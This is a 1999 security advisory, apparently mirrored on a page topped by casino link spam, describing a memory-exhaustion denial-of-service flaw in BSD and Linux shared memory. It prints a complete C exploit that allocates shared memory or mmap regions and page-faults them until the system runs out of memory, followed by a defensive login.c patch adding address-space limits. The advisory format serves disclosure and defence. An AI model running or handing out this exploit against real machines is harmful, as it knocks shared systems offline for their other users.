Casinos Not On GamstopNon Gamstop CasinosCasinos Not On GamstopOnline Casinos UKNon Gamstop Casino
19th Jul 1999 [SBWID-114]
COMMAND
	    Shared memory (IPC)
SYSTEMS AFFECTED
	    Most BSD kernels
PROBLEM
	    Mike  Perry  posted  following.   While  fiddling with various IPC
	    mechanisms and reading The Design and Implementation of 4.4BSD,  a
	    few things can struch reader as potentially dangerous.   According
	    to the book, when you request a shared memory segment via  mmap(),
	    the file isn't  actually physically in  memory until you  start to
	    trigger page faults and cause the vnode-pager to page in the  data
	    from the file.  Then,  the following passage from shmctl(2)  under
	    Linux caught  my eye:   "The user  must ensure  that a  segment is
	    eventually destroyed;  otherwise its  pages that  were faulted  in
	    will remain in memory or swap."
	    So as it  turns out that  it is in  fact possible to  create a DoS
	    condition by requesting a truckload of shared mem, then triggering
	    pagefaults in the entire shared region.  Now the end result is  no
	    different  than  a  simple  fork   or  malloc  bomb,  but  it   is
	    considerably harder to  prevent on most  systems.  This  is mainly
	    because:
	
	        1. The  system  does  not  check  rlimits for mmap and  shmget
	           (FreeBSD)
	        2. The system  never bothers to  offer the ability  to set the
	           rlimits for  virtual memory  via shells,  login process, or
	           otherwise.  (Linux)
	        3. b. The  system  does  not actually allocate shared   memory
	              until a page fault is triggered (this could be argued to
	              be a feature - Linux, *BSD)
	           a. The system does not  watch to make sure you  don't share
	              more memory than exists. (Linux, Irix, BSD?)
	        4. With System  V IPC, shared  memory persists even  after the
	           process is gone.   So even though  the kernel may  kill the
	           process  after  it  exhausts  all  memory from page faults,
	           there still  is 0  memory left  for the  system.   (suppose
	           with some trickery  you might be  able to achieve  the same
	           results  by  shared  mmap()'ing  a  few large files between
	           pairs of processes)  (All)
	
	    Mike attached a program  that will exploit these  conditions using
	    either shmget(), mmap(), or by getting malloc to mmap() (those are
	    in order  of effectivness).   This program  should compile  on any
	    architecture.  SGI  Irix is not  vulnerable.    Reading The Design
	    and Implementation of 4.4BSD, it sounds as if the BSDs should  all
	    be vulnerable.  FreeBSD will mmap  as much memory as you tell  it.
	    The  default  attack  is  __FUXX0R_MMAP__.   Mike posted the wrong
	    file.   He  meant  to  post  one  that  had  the default attack of
	    __FUXX0R_SYSV__,  and  with  __REALLY_FUXX0R__  undefined  (so the
	    prog wouldn't  actually page  fault and  kill your  system, if you
	    just wanted to see if  limits would kick in). Please  change these
	    before running the exploit. System V IPC is where the real  kernel
	    crusher is.
	    It seems  that OpenBSD  2.5-current (Jul  3) is  vulnerable.   The
	    place  to  check  if  you're  vulnerable  is sys/resource.h, or if
	    you're BSD and have  kernel source, checking sys/vm/vm_mmap.c  for
	    RLIMIT other than STACK  should let you know.   The proper way  to
	    fix this is to have a seperate limit for address space or  virtual
	    memory.  Solaris has both  (probably since their malloc uses  both
	    brk and mmap, and the virtual memory limit is for stopping  malloc
	    bombs).
	
	    /*
	     * This program can be used to exploit DoS bugs in the VM systems or utility
	     * sets of certain OS's.
	     *
	     * Common problems:
	     * 1. The system does not check rlimits for mmap and shmget (FreeBSD)
	     * 2. The system never bothers to offer the ability to set the rlimits for
	     *    virtual memory via shells, login process, or otherwise. (Linux)
	     * 3. b. The system does not actually allocate shared memory until a page fault
	     *       is triggered (this could be argued to be a feature - Linux, *BSD)
	     *    a. The system does not watch to make sure you don't share more memory
	     *       than exists. (Linux, Irix, BSD?)
	     * 4. With System V IPC, shared memory persists even after the process is
	     *    gone. So even though the kernel may kill the process after it exhausts all
	     *    memory from page faults, there still is 0 memory left for the system.
	     *    (All)
	     *
	     * This program should compile on any architecture. SGI Irix is not
	     * vulnerable. From reading The Design and Implementation of 4.4BSD it sounds
	     * as if the BSDs should all be vulnerable. FreeBSD will mmap as much memory
	     * as you tell it. I haven't tried page faulting the memory, as the system is
	     * not mine. I'd be very interested to hear about OpenBSD...
	     *
	     * This program is provided for vulnerability evaluation ONLY. DoS's aren't
	     * cool, funny, or anything else. Don't use this on a machine that isn't
	     * yours!!!
	     */
	    #include <stdio.h>
	    #include <errno.h>
	    #include <sys/ipc.h>
	    #include <sys/shm.h> /* redefinition of LBA.. PAGE_SIZE in both cases.. */
	    #ifdef __linux__
	    #include <asm/shmparam.h>
	    #include <asm/page.h>
	    #endif
	    #include <sys/types.h>
	    #include <stdio.h>
	    #include <sys/stat.h>
	    #include <sys/fcntl.h>
	    #include <sys/mman.h>
	    int len;
	    #define __FUXX0R_MMAP__
	    /* mmap also implements the copy-on-fault mechanism, but because the only way
	     * to easily exploit this is to use anonymous mappings, once the kernel kills
	     * the offending process, you can recover. (Although swap death may still
	     * occurr */
	    /* #define __FUXX0R_MMAP__ */
	    /* Most mallocs use mmap to allocate large regions of memory. */
	    /* #define __FUXX0R_MMAP_MALLOC__ */
	    /* Guess what this option does :) */
	    #define __REALLY_FUXX0R__
	    /* From glibc 2.1.1 malloc/malloc.c */
	    #define DEFAULT_MMAP_THRESHOLD (128 * 1024)
	    #ifndef PAGE_SIZE
	    # define PAGE_SIZE 4096
	    #endif
	    #ifndef SHMSEG
	    # define SHMSEG 256
	    #endif
	    #if defined(__FUXX0R_MMAP_MALLOC__)
	    void *mymalloc(int n)
	    {
	        if(n <= DEFAULT_MMAP_THRESHOLD)
		    n = DEFAULT_MMAP_THRESHOLD + 1;
	        return malloc(n);
	    }
	    void myfree(void *buf)
	    {
	        free(buf);
	    }
	    #elif defined(__FUXX0R_MMAP__)
	    void *mymalloc(int n)
	    {
	        int fd;
	        void *ret;
	        fd = open("/dev/zero", O_RDWR);
	        ret = mmap(0, n, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
	        close(fd);
	        return (ret == (void *)-1 ? NULL : ret);
	    }
	    void myfree(void *buf)
	    {
	        munmap(buf, len);
	    }
	    #elif defined(__FUXX0R_SYSV__)
	    void *mymalloc(int n)
	    {
	        char *buf;
	        static int i = 0;
	        int shmid;
	        i++; /* 0 is IPC_PRIVATE */
	        if((shmid = shmget(i, n, IPC_CREAT | SHM_R | SHM_W)) == -1)
	        {
	    #if defined(__irix__)
	    	    if (shmctl (shmid, IPC_RMID, NULL))
		    {
		        perror("shmctl");
		    }
	    #endif
		    return NULL;
	        }
	        if((buf = shmat(shmid, 0, 0)) == (char *)-1)
	        {
	    #if defined(__irix__)
	    	    if (shmctl (shmid, IPC_RMID, NULL))
		    {
		        perror("shmctl");
		    }
	    #endif
		    return NULL;
	        }
	    #ifndef __REALLY_FUXX0R__
	        if (shmctl (shmid, IPC_RMID, NULL))
	        {
		    perror("shmctl");
	        }
	    #endif
	        return buf;
	    }
	    void myfree(void *buf)
	    {
	        shmdt(buf);
	    }
	    #endif
	    #ifdef __linux__
	    void cleanSysV()
	    {
	        struct shmid_ds shmid;
	        struct shm_info shm_info;
	        int id;
	        int maxid;
	        int ret;
	        int shid;
	        maxid = shmctl (0, SHM_INFO, (struct shmid_ds *) &shm_info);
	        printf("maxid %d\n", maxid);
	        for (id = 0; id <= maxid; id++)
	        {
		    if((shid = shmctl (id, SHM_STAT, &shmid)) < 0)
		        continue;
		    if (shmctl (shid, IPC_RMID, NULL))
		    {
		        perror("shmctl");
		    }
		    printf("id %d has %d attachments\n", shid, shmid.shm_nattch);
		    shmid.shm_nattch = 0;
		    shmctl(shid, IPC_SET, &shmid);
		    if(shmctl(shid, SHM_STAT, &shmid) < 0)
		    {
		        printf("id %d deleted sucessfully\n", shid);
		    }
		    else if(shmid.shm_nattch == 0)
		    {
		        printf("Still able to stat id %d, but has no attachments\n", shid);
		    }
		    else
		    {
		        printf("Error, failed to remove id %d!\n", shid);
		    }
	        }
	    }
	    #endif
	    int main(int argc, char **argv)
	    {
	        int shmid;
	        int i = 0;
	        char *buf[SHMSEG * 2];
	        int max;
	        int offset;
	        if(argc < 2)
	        {
		    printf("Usage: %s <[0x]size of segments>\n", argv[0]);
	    #ifdef __linux__
		    printf("    or %s --clean (destroys all of IPC space you have permissions to)\n", argv[0]);
	    #endif
		    exit(0);
	        }
	    #ifdef __linux__
	        if(!strcmp(argv[1], "--clean"))
	        {
		    cleanSysV();
		    exit(0);
	        }
	    #endif
	        len = strtol(argv[1], NULL, 0);
	        for(buf[i] = mymalloc(len); i < SHMSEG * 2 && buf[i] != NULL; buf[++i] = mymalloc(len))
		    ;
	        max = i;
	        perror("Stopped because");
	        printf("Maxed out at %d %d byte segments\n", max, len);
	    #if defined(__FUXX0R_SYSV__) && defined(SHMMNI)
	        printf("Despite an alleged max of %d (%d per proc) %d byte segs. (Page "
		        "size: %d), \n", SHMMNI, SHMSEG, SHMMAX,  PAGE_SIZE);
	    #endif
	    #ifdef __REALLY_FUXX0R__
	        fprintf(stderr, "Page faulting alloced region... Have a nice life!\n");
	        for(i = 0; i < max; i++)
	        {
		    for(offset = 0; offset < len; offset += PAGE_SIZE)
		    {
		        buf[i][offset] = '*';
		    }
		    printf("wrote to %d byes of memory, final offset %d\n", len, offset);
	        }
	        // never reached :(
	    #else
	        for(i = 0; i <= max; i++)
	        {
		    myfree(buf[i]);
	        }
	    #endif
	        exit(42);
	    }
	
	    For people  who have  using small  segments to  map and caused the
	    program to segfault, this is  because the default attack is  mmap,
	    and you can  do an infinite  number of private  mmapings.  Use  an
	    array of pointers to keep track of the memory to free it when  the
	    __REALLY_FUXX0R__  option  isn't  set.   So  you  overrun your own
	    buffer.  The buffer size is 2 times the limit for SysV IPC  shares
	    for processes, so the buffer will not be overrun with that attack.
SOLUTION
	    Below is a patch to util-linux-2.9o login.c (and pathnames.h) that
	    provides a means under Linux  (should be pretty portable to  other
	    OS's) to set  limits for the  address space limit  (RLIMIT_AS: the
	    rlimit that controls how   much  data   you can actually map  into
	    your process).   The  patch is  based on  an  old program   called
	    lshell   that   set   limits  by  wrapping  your  shell.    Sample
	    /etc/limits file:
	
	        # Limit the user guest to 5 minutes CPU time and 8 procs, 5Mb address space guest C5P8V5D2
	        # 60 min's CPU time, 30 procs, 15Mb data, 50 megs total address space, 5 megs
	        # stack, 15 megs of RSS.
	        default C60P30D15V50S5R15
	
	    At the very  least, it is  recommended default V<size  of physical
	    memory>.  You can use lowercase letters for the next lowest  order
	    of magnitude of units.   The comment in the  patch explains it  in
	    further detail.   Note even  in this  case, a  determined user can
	    probably just login a dozen or so times and use SysV IPC to  steal
	    the system memory.
	
	    diff -ur ./util-linux-2.9o/lib/pathnames.h ./util-linux-2.9o-mp/lib/pathnames.h
	    --- ./util-linux-2.9o/lib/pathnames.h	Sun Oct 11 14:19:16 1998
	    +++ ./util-linux-2.9o-mp/lib/pathnames.h	Wed Jul 14 22:51:13 1999
	    @@ -86,6 +86,7 @@
	     #define _PATH_SECURE		"/etc/securesingle"
	     #define _PATH_USERTTY           "/etc/usertty"
	    +#define _PATH_LIMITS		"/etc/limits"
	     #define _PATH_MTAB		"/etc/mtab"
	     #define _PATH_UMOUNT		"/bin/umount"
	    diff -ur ./util-linux-2.9o/login-utils/login.c ./util-linux-2.9o-mp/login-utils/login.c
	    --- ./util-linux-2.9o/login-utils/login.c	Sat Mar 20 14:20:16 1999
	    +++ ./util-linux-2.9o-mp/login-utils/login.c	Wed Jul 14 22:49:24 1999
	    @@ -185,6 +185,7 @@
	     char *stypeof P_((char *ttyid));
	     void checktty P_((char *user, char *tty, struct passwd *pwd));
	     void sleepexit P_((int eval));
	    +void setup_limits P_(struct passwd *pwd);
	     #ifdef CRYPTOCARD
	     int cryptocard P_((void));
	     #endif
	    @@ -1110,6 +1111,8 @@
	         childArgv[childArgc++] = NULL;
	    +    setup_limits(pwd);
	    +
	         execvp(childArgv[0], childArgv + 1);
	         if (!strcmp(childArgv[0], "/bin/sh"))
	    @@ -1120,6 +1123,161 @@
	         exit(0);
	     }
	    +
	    +/* Most of this code ripped from lshell by Joel Katz */
	    +void process(char *buf)
	    +{
	    +    /* buf is of the form [Fn][Pn][Ct][Vm][Sm][Rm][Lm][Dm] where */
	    +    /* F specifies n max open files */
	    +    /* P specifies n max procs */
	    +    /* c specifies t seconds of cpu */
	    +    /* C specifies t minutes of cpu */
	    +    /* v specifies m kbs of total virtual memory (address space) */
	    +    /* V specifies m megs of total virtual memory (address space) */
	    +    /* s specifies m kbs of stack */
	    +    /* S specifies m megs of stack */
	    +    /* r specifies m kbs of RSS */
	    +    /* R specifies m megs of RSS */
	    +    /* l specifies m kbs of locked (non-swappable) memory */
	    +    /* L specifies m megs of locked (non-swappable) memory */
	    +    /* d specifies m kbs of Data segment */
	    +    /* D specifies m megs of Data segment */
	    +
	    +    struct rlimit rlim;
	    +    char *pp = buf;
	    +    int i;
	    +
	    +    while(*pp!=0)
	    +    {
	    +	i = 1;
	    +	switch(*pp++)
	    +	{
	    +	    case 'f':
	    +	    case 'F':
	    +		i = atoi(pp);
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_NOFILE, &rlim);
	    +		break;
	    +	    case 'p':
	    +	    case 'P':
	    +		i = atoi(pp);
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_NPROC, &rlim);
	    +		break;
	    +	    case 'C':
	    +		i = 60;
	    +	    case 'c':
	    +		i *= atoi(pp);
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_CPU, &rlim);
	    +		break;
	    +	    case 'V':
	    +		i = 1024;
	    +	    case 'v':
	    +		i *= atoi(pp)*1024;
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +#if defined(RLIMIT_AS) /* Linux */
	    +		setrlimit(RLIMIT_AS, &rlim);
	    +#else if defined(RLIMIT_VMEM) /* Irix */
	    +		setrlimit(RLIMIT_VMEM, &rlim);
	    +#endif
	    +		break;
	    +	    case 'S':
	    +		i = 1024;
	    +	    case 's':
	    +		i *= atoi(pp)*1024;
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_STACK, &rlim);
	    +		break;
	    +	    case 'R':
	    +		i = 1024;
	    +	    case 'r':
	    +		i *= atoi(pp)*1024;
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_RSS, &rlim);
	    +		break;
	    +	    case 'L':
	    +		i = 1024;
	    +	    case 'l':
	    +		i *= atoi(pp)*1024;
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_MEMLOCK, &rlim);
	    +		break;
	    +	    case 'D':
	    +		i = 1024;
	    +	    case 'd':
	    +		i *= atoi(pp)*1024;
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_DATA, &rlim);
	    +		break;
	    +	}
	    +    }
	    +}
	    +
	    +void setup_limits(struct passwd *pw)
	    +{
	    +    FILE *fp;
	    +    int i;
	    +    char buf[200], name[20], limits[64];
	    +    char *p;
	    +
	    +    if(pw->pw_uid == 0)
	    +    {
	    +	return;
	    +    }
	    +
	    +    if((fp = fopen(_PATH_LIMITS,"r")) == NULL)
	    +    {
	    +	return;
	    +    }
	    +
	    +    while(fgets(buf, 200, fp) != NULL)
	    +    {
	    +	if(buf[0] == '#')
	    +	    continue;
	    +
	    +	p = strchr(buf, '#');
	    +	if(p)
	    +	    *p = 0;
	    +
	    +	i=sscanf(buf, "%s %s", name, limits);
	    +
	    +	if(!strcmp(name, pw->pw_name))
	    +	{
	    +	    if(i==2)
	    +		process(limits);
	    +	    fclose(fp);
	    +	    return;
	    +	}
	    +    }
	    +    fclose(fp);
	    +    process(limits); /* Last line is default */
	    +}
	    +
	     void
	     getloginname()
	
	    SysVinit  (>2.54)  uses  /etc/initscript  (or /sbin/initscript) to
	    spawn the processes listed in /etc/inittab, so you can set  limits
	    within  that  (e.g.  for   the  getty  processes).   Either   wrap
	    in.telnetd or use -L  to wrap  the login  program.  Set limits  in
	    the  rc.init2  (etc)   script  for  daemons   which  may   execute
	    user-defined  code  (e.g.  crond,  httpd).   Similarly for xdm via
	    Xstartup.  You might also want to wrap your MDAs if you are  using
	    procmail or allow program aliases in ~/.forward files.
	    You have to use pam, or Sys V init, or patch.  Lshell does not set
	    the RLIMIT_AS limit either, you have to apply patch to it.   After
	    more research, it  seems that System  V implements RLIMIT_VMEM  to
	    stop people from exploiting this problem, but apparently when  BSD
	    implemented the Sys  V IPC, they  neglected to add  an appropriate
	    RLIMIT.
	

Internet highlights